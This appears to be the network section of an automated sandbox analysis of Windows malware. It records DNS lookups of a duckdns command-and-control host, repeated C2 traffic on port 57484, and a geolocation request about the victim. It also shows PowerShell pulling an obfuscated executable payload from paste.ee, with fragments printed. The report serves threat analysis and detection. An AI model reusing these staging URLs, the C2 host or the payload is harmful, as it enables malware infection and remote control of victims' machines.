                                                                                                Oct 22, 2024 06:17:32.643647909 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.644201040 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.644274950 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.686738014 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.686830044 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.686887026 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.716959000 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.717051983 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.717091084 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.717098951 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.717622042 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.717658043 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.717669010 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.718198061 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.718234062 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.718244076 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.718833923 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.718868971 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.718882084 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.719377995 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.719412088 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:32.719429016 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:32.798813105 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:34.794389963 CEST49749443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:34.794480085 CEST44349749104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.794555902 CEST49749443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:34.796252966 CEST49749443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:34.796293020 CEST44349749104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.889028072 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:34.895276070 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.895343065 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.895381927 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.895392895 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:34.895411015 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.895447016 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.895476103 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.895503044 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.895529985 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.895556927 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.895582914 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.895768881 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:34.901160955 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.901202917 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.901232004 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.901268005 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.907144070 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.907171965 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.907198906 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:34.907342911 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:35.424791098 CEST44349749104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:35.424886942 CEST49749443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:35.426696062 CEST49749443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:35.426724911 CEST44349749104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:35.427232027 CEST44349749104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:35.432691097 CEST49749443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:35.475326061 CEST44349749104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:35.580027103 CEST44349749104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:35.580235958 CEST44349749104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:35.580306053 CEST49749443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:35.580854893 CEST49749443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:42.577632904 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:42.587029934 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:42.592590094 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:43.981947899 CEST49750443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:43.982036114 CEST44349750104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:43.982131958 CEST49750443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:43.983951092 CEST49750443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:43.984033108 CEST44349750104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:44.588579893 CEST44349750104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:44.588705063 CEST49750443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:44.606710911 CEST49750443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:44.606789112 CEST44349750104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:44.607768059 CEST44349750104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:44.619961023 CEST49750443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:44.663403034 CEST44349750104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:44.762155056 CEST44349750104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:44.762423992 CEST44349750104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:44.762631893 CEST49750443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:44.779426098 CEST49750443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:51.809319019 CEST49751443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:51.809406996 CEST44349751104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:51.809490919 CEST49751443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:51.811512947 CEST49751443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:51.811553001 CEST44349751104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:52.434557915 CEST44349751104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:52.434672117 CEST49751443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:52.451739073 CEST49751443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:52.451822996 CEST44349751104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:52.452146053 CEST44349751104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:52.486773968 CEST49751443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:52.527350903 CEST44349751104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:52.632143021 CEST44349751104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:52.632257938 CEST44349751104.20.4.235192.168.2.4
                                                                                                Oct 22, 2024 06:17:52.632325888 CEST49751443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:17:52.633480072 CEST49751443192.168.2.4104.20.4.235
                                                                                                Oct 22, 2024 06:18:12.639847040 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:18:12.644210100 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:18:12.649530888 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:18:42.699285984 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:18:42.700551033 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:18:42.705885887 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:19:12.767426968 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:19:12.768656969 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:19:12.774101019 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:19:18.330507040 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:19:18.647664070 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:19:19.298985958 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:19:20.502109051 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:19:23.002218008 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:19:27.814642906 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:19:37.424164057 CEST4974880192.168.2.4178.237.33.50
                                                                                                Oct 22, 2024 06:19:42.831193924 CEST574844974543.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:19:42.831690073 CEST4974557484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:19:42.838329077 CEST574844974543.226.229.232192.168.2.4

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 22, 2024 06:17:03.118999958 CEST5349553192.168.2.41.1.1.1
                                                                                                Oct 22, 2024 06:17:03.517076969 CEST53534951.1.1.1192.168.2.4
                                                                                                Oct 22, 2024 06:17:07.919241905 CEST5831153192.168.2.41.1.1.1
                                                                                                Oct 22, 2024 06:17:07.930574894 CEST53583111.1.1.1192.168.2.4
                                                                                                Oct 22, 2024 06:17:15.074580908 CEST5575953192.168.2.41.1.1.1
                                                                                                Oct 22, 2024 06:17:15.087922096 CEST53557591.1.1.1192.168.2.4
                                                                                                Oct 22, 2024 06:17:23.253169060 CEST5755053192.168.2.41.1.1.1
                                                                                                Oct 22, 2024 06:17:23.261068106 CEST53575501.1.1.1192.168.2.4
                                                                                                Oct 22, 2024 06:17:25.653739929 CEST5209253192.168.2.41.1.1.1
                                                                                                Oct 22, 2024 06:17:25.769793034 CEST53520921.1.1.1192.168.2.4
                                                                                                Oct 22, 2024 06:17:28.328073025 CEST6015253192.168.2.41.1.1.1
                                                                                                Oct 22, 2024 06:17:28.337229013 CEST53601521.1.1.1192.168.2.4

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Oct 22, 2024 06:17:03.118999958 CEST192.168.2.41.1.1.10x14b1Standard query (0)ftp.desckvbrat.com.brA (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:07.919241905 CEST192.168.2.41.1.1.10xabc7Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:15.074580908 CEST192.168.2.41.1.1.10xc9dfStandard query (0)b2case.comA (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:23.253169060 CEST192.168.2.41.1.1.10xf38cStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:25.653739929 CEST192.168.2.41.1.1.10x6b15Standard query (0)iwarsut775laudrye001.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:28.328073025 CEST192.168.2.41.1.1.10x3b17Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Oct 22, 2024 06:17:03.517076969 CEST1.1.1.1192.168.2.40x14b1No error (0)ftp.desckvbrat.com.brdesckvbrat.com.brCNAME (Canonical name)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:03.517076969 CEST1.1.1.1192.168.2.40x14b1No error (0)desckvbrat.com.br191.252.83.213A (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:07.930574894 CEST1.1.1.1192.168.2.40xabc7No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:07.930574894 CEST1.1.1.1192.168.2.40xabc7No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:15.087922096 CEST1.1.1.1192.168.2.40xc9dfNo error (0)b2case.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:15.087922096 CEST1.1.1.1192.168.2.40xc9dfNo error (0)b2case.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:23.261068106 CEST1.1.1.1192.168.2.40xf38cNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:23.261068106 CEST1.1.1.1192.168.2.40xf38cNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:23.261068106 CEST1.1.1.1192.168.2.40xf38cNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:25.769793034 CEST1.1.1.1192.168.2.40x6b15No error (0)iwarsut775laudrye001.duckdns.org43.226.229.232A (IP address)IN (0x0001)false
                                                                                                Oct 22, 2024 06:17:28.337229013 CEST1.1.1.1192.168.2.40x3b17No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • paste.ee
                                                                                                • b2case.com
                                                                                                • pastebin.com
                                                                                                • geoplugin.net

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449748178.237.33.50808160C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 22, 2024 06:17:28.361958027 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                Host: geoplugin.net
                                                                                                Cache-Control: no-cache
                                                                                                Oct 22, 2024 06:17:29.198045015 CEST1165INHTTP/1.1 200 OK
                                                                                                date: Tue, 22 Oct 2024 04:17:29 GMT
                                                                                                server: Apache
                                                                                                content-length: 957
                                                                                                content-type: application/json; charset=utf-8
                                                                                                cache-control: public, max-age=300
                                                                                                access-control-allow-origin: *
                                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                                                                                Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449732188.114.96.34431928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-22 04:17:08 UTC67OUTGET /d/jm8qu/0 HTTP/1.1
                                                                                                Host: paste.ee
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-22 04:17:08 UTC1228INHTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:08 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=2592000
                                                                                                strict-transport-security: max-age=63072000
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block
                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a1Mhy3LlfQUal%2BaUeetc5VDzVhjjNh5zmfp4qmf9owzPZ4fg61B6aHXiTZOxxmYTOIKPTLX0VCMocPzTajkN5JcuSACTiSoTz1NOfHAS1YnZVSKGqOynDw0SBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad0d1f384605-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-10-22 04:17:08 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 30 38 39 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 36 30 31 39 37 36 26 63 77 6e 64 3d 32 34 39 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 39 36 39 35 33 34 32 36 32 37 32 30 38 38 63 65 26 74 73 3d 32 31 36 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1089&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=2601976&cwnd=249&unsent_bytes=0&cid=96953426272088ce&ts=216&x=0"
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 31 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                                                                                Data Ascii: 1f7fTVqQ::M::::E:::://8::Lg:::::::::Q:::::::::::::
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d 68 49 e2 86
                                                                                                Data Ascii: B:::B::::::E:::E::::::::B:::::::::::::::MhI
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                                                                                Data Ascii: :::I::::::::::::::::::C:::G:ucnNyYw:::GgD::::Y::
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6f 6f 43 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 6f e2 86 93 3a e2 86 93 45 7a e2 86 93 3a e2 86 93 44 e2 86 93 3a e2 86 93 45 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86
                                                                                                Data Ascii: ::::::::::::::::::::::BooCg::Bio:Ez:D:E8:::::::
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 51 49 6f 43 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6a 6e 79 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 59 30 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 4a 52 5a 79 31 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 63 42 63 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 71 49 6c 46 77 57 69 4a 52 68 79 42 77 45 e2 86 93 3a e2 86 93 63 42 6b 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 71 49 6c 47 52 6b 6f 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 71 49 6c 47 6e 4a 48 e2 86 93 3a e2 86 93 51 42 77 46 69 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 6f 69 55 62 42 4b 49 6c 48
                                                                                                Data Ascii: ::EQIoCQ::Cjny::::HY0C:::BJRZy1Q::cBcoCw::BqIlFwWiJRhyBwE:cBkoCw::BqIlGRkoB:::BqIlGnJH:QBwFigL:::GoiUbBKIlH
                                                                                                2024-10-22 04:17:08 UTC1226INData Raw: 93 3a e2 86 93 43 71 49 6c 47 6e 49 6d e2 86 93 3a e2 86 93 77 42 77 47 79 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 6f 69 55 62 42 6d 38 53 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 6f 69 55 63 63 69 6f 44 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 64 4b e2 86 93 3a e2 86 93 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 61 69 4b e2 86 93 3a e2 86 93 6f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 57 46 68 55 6f 44 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 5a 79 4c 67 4d e2 86 93 3a e2 86 93 63 42 6f 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6e 34 46 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 63 6c e2 86 93 3a e2 86
                                                                                                Data Ascii: :CqIlGnIm:wBwGygL:::GoiUbBm8S:::KoiUccioD:H:dK:s:::aiK:o:::oWFhUoDQ::CiZyLgM:cBooCw::Bn4F:::Ecl:
